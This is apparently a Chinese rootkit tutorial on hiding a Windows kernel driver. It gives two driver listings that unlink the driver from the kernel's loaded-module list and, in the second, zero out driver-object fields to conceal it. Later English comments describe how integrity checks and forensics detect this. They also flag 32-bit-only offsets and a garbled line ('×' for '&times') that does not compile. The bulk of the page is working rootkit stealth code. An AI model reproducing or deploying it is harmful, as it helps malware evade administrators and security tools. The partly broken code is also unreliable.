[Rootkit] 驱动隐藏 - 断链


注意：此方法会触发 PatchGuard（PG）。

代码参考 1

/*
 * Hand-rolled view of the module entry that DriverEntry (listing 1) pulls
 * out of the driver object.  Only `listentry` is ever touched by the code on
 * this page; `path` and `name` are never read.  The `unknownN` padding shows
 * the layout was reverse-guessed for one OS build.
 * NOTE(review): assumes 32-bit, ULONG-sized fields at these offsets —
 * confirm against the target build before trusting any of it.
 */
typedef struct _driverdata
{
	LIST_ENTRY listentry;	/* links this entry into a kernel module list (presumably the loaded-module list) */
	ULONG unknown1;
	ULONG unknown2;
	ULONG unknown3;
	ULONG unknown4;
	ULONG unknown5;
	ULONG unknown6;
	ULONG unknown7;
	UNICODE_STRING path;	/* unused on this page */
	UNICODE_STRING name;	/* unused on this page */
}driverdata;



/* Unload routine installed by DriverEntry in listing 1; it only logs. */
VOID xiezai1(PDRIVER_OBJECT qudongduixiang)
{
	(void)qudongduixiang;	/* driver object is not needed here */
	KdPrint(("驱动卸载\n"));
}
 
/*
 * DriverEntry for listing 1: unlinks this driver's module entry from its
 * doubly-linked list, then installs the unload routine and reports success.
 * Defender note: the unlinked entry keeps its own Flink/Blink (nothing below
 * resets them), and the list no longer agrees with the image that is still
 * mapped in memory.  That inconsistency is exactly what kernel integrity
 * checks (the "PG" note above) and memory-forensic module scans flag.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT qudongduixiang, PUNICODE_STRING zhucebiao)
{
	KdPrint(("驱动入口开始\n"));
	driverdata*driverdata1 = NULL;
	/* Reads a pointer at hard-coded byte offset 20 of the driver object through
	 * a ULONG cast: 32-bit-only pointer arithmetic.  Listing 2 reaches the same
	 * kind of pointer through the named DriverSection member — presumably the
	 * same field; confirm against the target build's DRIVER_OBJECT layout. */
	driverdata1 = *(driverdata**)((ULONG)qudongduixiang + 20);
	if (driverdata1!=NULL)
	{
		/* Classic unlink: prev->Flink = next; next->Blink = prev.
		 * The first line writes through a ULONG*, i.e. the Flink slot (first
		 * member of LIST_ENTRY) of the previous entry — again 32-bit-only. */
		*(ULONG*)driverdata1->listentry.Blink = (ULONG)driverdata1->listentry.Flink;
		driverdata1->listentry.Flink->Blink = driverdata1->listentry.Blink;
	}
	qudongduixiang->DriverUnload = xiezai1;
	return STATUS_SUCCESS;
}

代码参考 2

#include "ntddk.h"
/* File-scope thread handle: written by PsCreateSystemThread in DriverEntry
 * (listing 2) and closed by ThreadRun itself; no synchronization around it. */
HANDLE hThread;
/* Unload routine for listing 2; it only logs.  Note that this listing's
 * DriverEntry never assigns it to pDriverObject->DriverUnload. */
VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
{
	(void)pDriverObject;	/* driver object is not needed here */
	DbgPrint("驱动卸载成功\n");
}

/*
 * System-thread body started from DriverEntry (listing 2) with the driver
 * object as StartContext.  After a delay it clears several DRIVER_OBJECT
 * fields and closes the global thread handle.
 * Defender note: a driver object whose size/start/init/section fields are
 * all zero while its image is still mapped is a self-inconsistency that
 * memory-forensic cross-checks of driver objects against module lists
 * pick up; it does not make the code pages disappear.
 */
VOID ThreadRun(
	 PVOID StartContext)
{
	LARGE_INTEGER times;
	PDRIVER_OBJECT pDriverObject;
	/* Negative value = relative interval.  KeDelayExecutionThread counts in
	 * 100-ns units, so -30,000,000 is 3 s; the original comment called the
	 * unit "nanoseconds", which is off by a factor of 100. */
	times.QuadPart = -30 * 1000 * 1000;
	
	/* NOTE(review): `×` looks like an extraction artifact of `&times`
	 * (an HTML entity mangled the address-of); as printed this line does not
	 * compile. */
	KeDelayExecutionThread(KernelMode, FALSE, ×);
	pDriverObject=(PDRIVER_OBJECT)StartContext;
	/* Zero the driver object's module bookkeeping fields.  DriverSection was
	 * already unlinked from its list in DriverEntry; here the pointer itself
	 * is dropped too. */
	pDriverObject->DriverSize = 0;
	pDriverObject->DriverSection = NULL;
	pDriverObject->DriverExtension = NULL;
	pDriverObject->DriverStart = NULL;
	pDriverObject->DriverInit = NULL;
	pDriverObject->FastIoDispatch = NULL;
	pDriverObject->DriverStartIo = NULL;
	
	/* Closes the handle DriverEntry stored in the global; the routine then
	 * simply returns (no PsTerminateSystemThread call). */
	ZwClose(hThread);
}


/*
 * DriverEntry for listing 2: unlinks the entry referenced by DriverSection
 * from its doubly-linked list, then spawns ThreadRun to scrub the driver
 * object later.  Unlike listing 1 there is no NULL check on DriverSection,
 * and the PsCreateSystemThread result is ignored.  DriverUnload is defined
 * above but never installed here.
 * Defender note: as in listing 1, the entry's own Flink/Blink still point at
 * its former neighbours, and the list/image mismatch is what integrity
 * checks (the "PG" note above) and module-list cross-checks detect.
 */
NTSTATUS	DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pReg)
{
	PLIST_ENTRY pModuleList;
	/* Treats DriverSection as the list entry itself (its first member);
	 * listing 1 reaches the same pointer via a hard-coded offset. */
	pModuleList = pDriverObject->DriverSection;
	
	/* previous module's Flink = this module's Flink */
	pModuleList->Blink->Flink = pModuleList->Flink;
	/* next module's Blink = this module's Blink */
	pModuleList->Flink->Blink = pModuleList->Blink;
	/* Handle lands in the global hThread; the thread closes it itself.
	 * Return status is not checked. */
	PsCreateSystemThread(&hThread,GENERIC_ALL,NULL,NULL,NULL, ThreadRun, pDriverObject);
	return 0;	/* == STATUS_SUCCESS */
}
